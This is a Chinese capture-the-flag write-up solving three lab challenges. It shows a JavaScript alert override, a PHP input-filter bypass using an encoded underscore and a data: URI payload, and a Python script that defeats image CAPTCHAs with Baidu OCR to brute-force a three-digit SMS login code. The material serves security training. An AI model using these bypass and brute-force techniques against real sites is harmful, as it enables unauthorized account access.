4、怎么就是不弹出key呢?
分值: 150
提交说明:提交前14个字符即可过关
解题思路:
a)首先点击界面超链接没反应,先右键查看源代码;
b)先搜索alert,发现alert有两处,第二处的alert为真正需要触发的alert,上面一处alert被重写,返回了return false,导致下面一处函数的alert不生效,因此删除上面一处alert函数;
c)重新运行页面发现可以弹框,但不好复制,而且弹框内容中将alert中文本部分混淆入字符串中,无法顺利复制出变量d的前14个字符,因此添加console.log函数直接输出变量d的内容;
8、微笑一下就能过关了
分值: 150
尼玛,碰到这样的题我能笑得出来嘛...
解题思路:
a)查看index.php中的源代码,整个校验主体是$_GET方法,该方法用于收集来自 method="get" 的表单中的参数和值,所以可以确定该题需要在URL地址串后面跟?参数为“^_^”;
b)下面来看参数^_^后面的值,初始值smile为1,preg_match是一个正则表达式匹配函数,可以看到将点号,百分号,0-9的数字,各种常见传输协议等等全部过滤掉了,如果参数值中带上述内容则smile得值会被赋0,就没办法走到最后这个分支判断:
if ($smile) {
$smile = @file_get_contents ($_GET['^_^']);
if ($smile === "(●'◡'●)") die($flag);
}
要走到这个分支判断必须smile为1,且file_get_contents(把整个文件读入一个字符串中的函数)需要有个文件形式传入内容,且内容中带(●'◡'●),此时判断条件才能为真,才能走die($flag)函数,退出当前脚本,并输出一条消息,flag输出的消息就是我们要拿到的通关key;
c)经过上一步分析,我们首先需要找出一个协议,是能够传输文件内容的,这里我们用到data:伪协议,那么?后面跟的大致内容就成型了:
?^_^=data:, (●'◡'●)
data协议参考:
但是还有一句条件:
if (preg_match ('/_/', $_SERVER['QUERY_STRING'])) $smile = 0;
其中的$_SERVER['QUERY_STRING']含义是取请求整个URL中问号后面的参数值部分内容,举例含义参考下图,另外结合正则函数,可以发现^_^中的下划线刚好被匹配到,所以这个下划线必须经过URL编码,所以现在内容调整为:
?^%5f^=data:, (●'◡'●)
d)这样一来下面这句判断也就自动通过了,file_exists() 函数检查文件或目录是否存在,如果指定的文件或目录存在则返回 TRUE,否则返回 FALSE,经过编码,^_^不存在,返回false,也就是0,不会执行smile的赋值;
if ($smile) {
if (@file_exists ($_GET['^_^'])) $smile = 0;
}
因此答案就是:
?^%5f^=data:, (●'◡'●)
11、验证码识别
分值: 350
验证码识别
Tips:验证码依然是3位数
解题思路:
a)该关Tips明确给出该题重点为验证码识别,因此主要方向是考虑写脚本自动每次识别验证码,然后自动提交尝试暴力破解验证码:
b)经过尝试python自带的pytesseract验证码识别率低,因此改用百度OCR,识别率高,使用简单,唯一就是需要外网连网访问接口,不能本地识别,且免费使用有次数、并发量限制,但练习使用已经足够,百度OCR使用教学视频参考:
脚本跑出结果:
下面直接贴出代码段:
import base64
import requests
import urllib.request
import time
import re
import sys
s=requests.Session()
url="http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php"
head={'cookie':'PHPSESSID=2572f663cf4fbc2bbd35da2e929d2a00'}
def main():
num=100
while num<1000:
code=get_code()
# 此处休眠1秒防止百度ocr的qps限制导致失败
# time.sleep(1)
get_url(num,code)
num+=1
#调用百度ocr识别接口
# client_id 为官网获取的AK, client_secret 为官网获取的SK
def get_token():
host = 'https://aip.baidubce.com/oauth/2.0/token?grant_type=client_credentials&client_id=你自己的id&client_secret=你自己的secret'
response = requests.get(host)
if response:
print(response.json())
#下载图片到本地,百度ocr只支持下载到本地的图片识别,貌似无法直接识别url里的验证码
def get_img():
img_url="http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php"
file_path='你自己的路径'
file_name='你自己的路径/code.png'
# 这里必须加headers不然虽然验证码刷新,但无法和上面的login请求关联,还是会提示验证码失效
headers=("Cookie","PHPSESSID=2572f663cf4fbc2bbd35da2e929d2a00")
opener = urllib.request.build_opener()
opener.addheaders = [headers]
urllib.request.install_opener(opener)
urllib.request.urlretrieve(img_url,filename=file_name)
# 通用文字识别(高精度版)
def get_code():
get_img()
request_url = "https://aip.baidubce.com/rest/2.0/ocr/v1/accurate_basic"
# 二进制方式打开图片文件
f = open('/Users/wuguoxiang/Downloads/code.png', 'rb')
img = base64.b64encode(f.read())
params = {"image":img}
access_token = '你自己的token'
request_url = request_url + "?access_token=" + access_token
headers = {'content-type': 'application/x-www-form-urlencoded'}
response = requests.post(request_url, data=params, headers=headers)
try:
code=response.json()['words_result']
# print(code)
code=re.findall('\d\d\d\d',str(code))
print('验证码是:',code[0])
return code[0]
except IndexError:
print('百度OCR没有识别到验证码,正在重试......')
time.sleep(0.5)
code=response.json()['words_result']
code=re.findall('\d\d\d\d',str(code))
print('验证码是:',code[0])
return code[0]
except KeyError:
print('QPS限制,验证码识别失败,正在重试......:')
# 百度OCR有并发量限制,因此需要等待若干秒后重新尝试
time.sleep(3)
response = requests.post(request_url, data=params, headers=headers)
code=response.json()['words_result']
code=re.findall('\d\d\d\d',str(code))
print('验证码是:',code[0])
return code[0]
except:
print('验证码识别未知错误【1】!',sys.exc_info())
def get_url(num,code):
data={'username':'13388886666','mobi_code':num,'user_code':code,'Login':'submit'}
res=s.post(url,data=data,headers=head).content.decode('utf-8')
if 'error' in res:
print('手机验证码:',num,'---验证错误',res)
elif '验证码失效' in res:
print(res)
elif '手机验证码还没发呢' in res:
print(res)
elif 'flag' in res:
print('手机验证码是',num,res)
sys.exit()
else:
sys.exit()
if __name__=='__main__':
main()